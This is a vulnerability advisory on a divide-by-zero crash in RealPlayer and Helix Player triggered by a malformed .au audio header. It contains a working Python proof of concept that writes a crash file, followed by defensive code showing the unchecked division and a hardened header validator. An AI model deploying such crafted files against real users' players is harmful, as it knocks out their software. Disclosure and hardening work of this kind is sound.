RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability
OS2A ID: OS2A_1010
08/21/2007 Issue Discovered
08/31/2007 Vendor Notification
Class: Denial of Service
Severity: High
Overview:
-------------
RealPlayer/Helix Player is a media player that will play popular media formats
as well as organize your music and videos.
Description:
--------------
A denial-of-service flaw exists in RealPlayer and Helix Player when a user
opens a malformed .au (Sun audio) file. The flaw is a division by zero that
occurs while the player processes the header of the malformed AU file; in the
proof-of-concept file below the channel-count field of that header is zero.
An attacker must entice an unsuspecting user to open a maliciously crafted AU
file.
Impact:
--------
Successful exploitation allows an attacker to crash a vulnerable player by
having the victim open a specially crafted file (denial of service). The
impact is limited to availability: the player terminates on the arithmetic
exception, and the advisory reports no confidentiality or integrity impact.
Affected Software(s):
---------------------
RealPlayer 10.1.0.3114 and prior
Helix Player
Tested on:
- RealPlayer 10.1.0.3114
- RealPlayer 10.0.9
- RealPlayer 10.0.8 on FC6, RH9, RHEL and SuSE respectively
- RealPlayer 10.5 Gold on Windows XP
- Helix Player 1.0.6.778 on FC6
AV MP3 Player and Media Player Classic were also found to be vulnerable.
Affected Platform:
------------------
Microsoft Windows (all versions)
RedHat Linux
Fedora Core Linux
SuSE Linux
Proof of Concept:
------------------
The following Python 3 program generates a malformed .au file (exploit.au in
the current directory):

    import sys

    # Malformed Sun audio (.au) header, 85 bytes, big-endian 32-bit fields:
    #   magic        ".snd"
    #   data offset  0x00000118 (280, larger than the whole file)
    #   data size    0x020142DC
    #   encoding     0x00000001 (8-bit G.711 mu-law)
    #   sample rate  0x02021F40
    #   channels     0x00000000 (zero)
    # followed by annotation/padding bytes.
    head = (b"\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01" +
            b"\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +
            b"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")

    print("[x] RealPlayer/Helix Player/Kaboodle Player DoS")
    try:
        # binary mode: no newline translation on Windows
        f = open("exploit.au", "wb")
    except IOError as e:
        print("Unable to open file", e)
        sys.exit(0)
    print("[x] File successfully opened for writing.")
    try:
        f.write(head)
    except IOError as e:
        print("Unable to write to file", e)
        sys.exit(0)
    print("[x] File successfully written.")
    f.close()
    print("[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players.")
    # End of program
RealPlayer crashes with a floating point exception (SIGFPE). The message below
is printed by the shell running the realplay launcher script, which reports
the signal together with the command line that started the binary:
Floating point exception$REALPLAYBIN "$@"
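The header fields the proof-of-concept file carries, and the check that would have rejected it, as an added example in Python; this is not part of the advisory and not RealPlayer or Helix code. It parses the 24-byte big-endian AU header, shows the trusting frame-size arithmetic that divides by the zero channel count, and a hardened parser that validates each field before using it as a divisor or bound. Both sample inputs are constructed here (the malformed one is the first 24 bytes of the exploit.au above). The channel and sample-rate limits are assumed sanity bounds, not values from the AU specification, and the link between the zero channel count and the player's actual division is an inference from the file, not something the advisory states.

```python
import struct

AU_MAGIC = b".snd"
AU_HEADER_LEN = 24          # six big-endian 32-bit fields
MAX_CHANNELS = 256          # assumed sanity limit, not from the AU spec
MAX_SAMPLE_RATE = 192000    # assumed sanity limit, not from the AU spec
UNKNOWN_SIZE = 0xFFFFFFFF   # AU convention: data size not known

# Bytes per sample for the common AU encodings; anything else is rejected.
BYTES_PER_SAMPLE = {
    1: 1,   # 8-bit G.711 mu-law
    2: 1,   # 8-bit linear PCM
    3: 2,   # 16-bit linear PCM
    4: 3,   # 24-bit linear PCM
    5: 4,   # 32-bit linear PCM
    6: 4,   # 32-bit IEEE float
    7: 8,   # 64-bit IEEE float
    27: 1,  # 8-bit G.711 A-law
}

# Constructed input: the first 24 bytes of the advisory's exploit.au
# (magic, data offset 0x118, data size, encoding 1, sample rate, channels 0).
MALFORMED = (b"\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"
             b"\x02\x02\x1F\x40\x00\x00\x00\x00")

# Constructed input: a sane header, 8 kHz mono mu-law, 16000 data bytes
# starting directly after the 24-byte header.
WELL_FORMED = struct.pack(">4sIIIII", AU_MAGIC, 24, 16000, 1, 8000, 1)


def parse_header(data):
    """Split the fixed 24-byte AU header into its six fields; no validation."""
    if len(data) < AU_HEADER_LEN:
        raise ValueError("file shorter than the 24-byte AU header")
    magic, offset, size, encoding, rate, channels = struct.unpack(
        ">4sIIIII", data[:AU_HEADER_LEN])
    return {"magic": magic, "offset": offset, "size": size,
            "encoding": encoding, "rate": rate, "channels": channels}


def frame_count_naive(data):
    """Trust the header and divide: the pattern behind the advisory's crash.
    With channels == 0 the frame size is 0 and the division raises
    ZeroDivisionError (SIGFPE in native code)."""
    h = parse_header(data)
    frame_bytes = h["channels"] * BYTES_PER_SAMPLE.get(h["encoding"], 1)
    return h["size"] // frame_bytes


def crashes_naively(data):
    """True if the trusting computation dies on this header."""
    try:
        frame_count_naive(data)
    except ZeroDivisionError:
        return True
    return False


def frame_count_checked(data):
    """Hardened version: validate every field used as a divisor or bound
    before doing arithmetic with it, and bound the data size by the file."""
    h = parse_header(data)
    if h["magic"] != AU_MAGIC:
        raise ValueError("bad magic %r" % h["magic"])
    if h["encoding"] not in BYTES_PER_SAMPLE:
        raise ValueError("unsupported encoding %d" % h["encoding"])
    if not 1 <= h["channels"] <= MAX_CHANNELS:
        raise ValueError("channel count %d out of range" % h["channels"])
    if not 1 <= h["rate"] <= MAX_SAMPLE_RATE:
        raise ValueError("sample rate %d out of range" % h["rate"])
    if h["offset"] < AU_HEADER_LEN or h["offset"] > len(data):
        raise ValueError("data offset %d outside file" % h["offset"])
    available = len(data) - h["offset"]
    size = available if h["size"] == UNKNOWN_SIZE else min(h["size"], available)
    return size // (h["channels"] * BYTES_PER_SAMPLE[h["encoding"]])


def check_file(data):
    """Return (True, frame_count) for an acceptable file, else (False, reason)."""
    try:
        return True, frame_count_checked(data)
    except ValueError as e:
        return False, str(e)


if __name__ == "__main__":
    print("naive crashes on exploit header:", crashes_naively(MALFORMED))
    print("checked:", check_file(MALFORMED))
    print("checked, sane file:", check_file(WELL_FORMED + b"\x00" * 16000))
```

The order of the checks matters: every field is validated before it is multiplied or divided, so a zero channel count is reported as a bad file rather than reaching the division, and the declared data size is clamped to what the file actually contains so a header claiming more data than exists cannot drive a read past the end.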
CVSS Score Report:
------------------
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C)
CVSS Temporal Score = 6.4 (E:POC/RL:U/RC:C)
Risk factor = High
Reference:
-----------
A similar attack was recently reported against Windows Media Player:
http://www.safehack.com/exp/mp/mplayer11.txt
Solution/Work Around:
--------------------
Do not open .au files from untrusted sources. No vendor fix was available at
the time of publication (remediation level: unavailable).
Credits:
--------
Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A are credited with the
discovery of this vulnerability.